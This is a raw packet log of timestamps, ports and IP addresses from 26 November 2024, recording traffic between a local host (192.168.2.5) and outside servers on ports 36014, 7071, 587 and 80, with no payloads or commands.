Nov 26, 2024 09:01:52.790040016 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790168047 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790179968 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790188074 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790193081 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790327072 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790348053 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790357113 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790462971 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790482998 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790492058 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790503025 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790589094 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790608883 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790617943 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790627003 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790636063 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790750980 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790771008 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790916920 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790926933 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790935040 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.791089058 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.791099072 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.791115999 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.791126013 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.791230917 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.897627115 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909187078 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909207106 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909219980 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909239054 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909287930 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909353018 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909389973 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909435034 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909456015 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909491062 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909532070 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909599066 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909645081 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909686089 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909697056 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909782887 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909794092 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909806013 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909893036 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.909981966 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.910099030 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.910222054 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.910368919 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.910486937 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.910610914 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.910762072 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.910959959 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.910993099 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.911401987 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.911521912 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.911717892 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.911788940 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.911798954 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.928025961 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:52.928185940 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:52.951287031 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.964327097 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:53.048182011 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:53.084551096 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:53.084580898 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:53.084870100 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:53.084880114 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:53.084933043 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:53.084959984 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:53.085149050 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:53.085159063 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:53.085268974 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:53.085297108 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:53.085449934 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:53.085530996 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:53.085540056 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:53.328847885 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:53.329056025 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:53.386522055 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:53.391596079 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:53.448956013 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:53.513479948 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:53.530023098 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:53.650096893 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:53.730020046 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:53.730490923 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:53.850384951 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:54.137921095 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:54.137950897 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:54.137969017 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:54.138021946 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:54.139298916 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:54.259255886 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:54.539994001 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:54.547091961 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:54.667109966 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:54.753182888 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:54.754657030 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:54.874742985 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:54.947885036 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:54.948276997 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:55.071029902 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:55.351566076 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:55.355520010 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:55.475728035 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:55.759846926 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:55.760088921 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:55.880050898 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:56.161109924 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:56.161375046 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:56.281615973 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:56.567353010 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:56.568099022 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:56.688010931 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:56.969954014 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:56.970385075 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:56.970385075 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:56.970385075 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:56.970385075 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:56.970385075 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:57.091063976 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:57.091239929 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:57.091252089 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:57.091286898 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:57.091296911 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:57.461551905 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:57.512926102 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:57.581408978 CET	49717	80	192.168.2.5	193.122.6.168
Nov 26, 2024 09:01:57.701920033 CET	80	49717	193.122.6.168	192.168.2.5
Nov 26, 2024 09:01:57.996980906 CET	80	49717	193.122.6.168	192.168.2.5
Nov 26, 2024 09:01:57.997694016 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:58.043889046 CET	49717	80	192.168.2.5	193.122.6.168
Nov 26, 2024 09:01:58.117604971 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:58.399298906 CET	587	49792	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:58.399831057 CET	49792	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:58.400125980 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:58.520373106 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:58.520493984 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:59.084014893 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:59.087189913 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:59.207222939 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:59.781232119 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:01:59.810846090 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:01:59.931246042 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:00.224988937 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:00.225156069 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:00.345547915 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:00.464260101 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:00.512630939 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:02:00.639564037 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:00.639990091 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:00.760071039 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:01.065761089 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:01.065841913 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:01.065892935 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:01.065900087 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:01.068351984 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:01.188800097 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:01.314825058 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:02:01.318000078 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:01.318985939 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:02:01.435048103 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:01.439301014 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:01.482610941 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:01.483747959 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:01.604547024 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:01.690208912 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:01.761811972 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:02:01.764739037 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:01.789521933 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:01.828037024 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:02:01.881738901 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:01.897610903 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:01.897821903 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:01.915846109 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:02:02.017829895 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:02.201251030 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:02.222440958 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:02:02.312002897 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:02.312423944 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:02.342427969 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:02.432620049 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:02.741060972 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:02.745318890 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:02.865372896 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:03.166723013 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:03.166927099 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:03.286834002 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:03.585763931 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:03.586103916 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:03.706089973 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:03.999881983 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.000252008 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.000294924 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.000343084 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.000364065 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.000396967 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.013530016 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.120559931 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.120589972 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.120603085 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.120660067 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.120680094 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.120691061 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.133909941 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.133920908 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.133939981 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.133948088 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.133975983 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.133995056 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.134004116 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.134010077 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.134053946 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.134057999 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.134068012 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.134098053 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.134126902 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.134155989 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.241928101 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.241992950 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.242003918 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.242059946 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.254017115 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.254122019 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.254131079 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.254196882 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.254287958 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.254342079 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.254391909 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.254436970 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.254441023 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.254571915 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.254622936 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.254638910 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.254678011 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.254717112 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.254724026 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.254743099 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.254762888 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.362230062 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.362248898 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.362335920 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.374296904 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.374360085 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.374489069 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.374540091 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.374638081 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.374703884 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.374705076 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.374771118 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.374906063 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.374946117 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.375016928 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375144958 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375154972 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.375238895 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.375246048 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375284910 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.375330925 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375408888 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.375416994 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375442982 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375475883 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.375504017 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.375534058 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375544071 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375602961 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375639915 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.375654936 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.375659943 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375741005 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.375771046 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375781059 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375832081 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.375870943 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375880003 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375890017 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375899076 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375914097 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.375915051 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.375952005 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.375967979 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.376087904 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.376106977 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.376143932 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.376173019 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.376177073 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.376223087 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.482495070 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.482525110 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.482656002 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.482702017 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.482721090 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.482769966 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.482770920 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.482819080 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.482851982 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.482861996 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.482914925 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.483025074 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.483074903 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.494350910 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.494404078 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.494435072 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.494582891 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.494625092 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.494648933 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.494652987 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.494694948 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.494769096 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.494780064 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.494820118 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.494836092 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.494931936 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.494941950 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.494988918 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.495069027 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.495080948 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.495150089 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.495234966 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.495254993 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.495296955 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.495325089 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.495366096 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.495399952 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.495415926 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.495446920 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.495604038 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.495614052 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.495666027 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.495758057 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.495768070 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.495810986 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.495855093 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.495865107 CET	587	49809	51.195.88.199	192.168.2.5
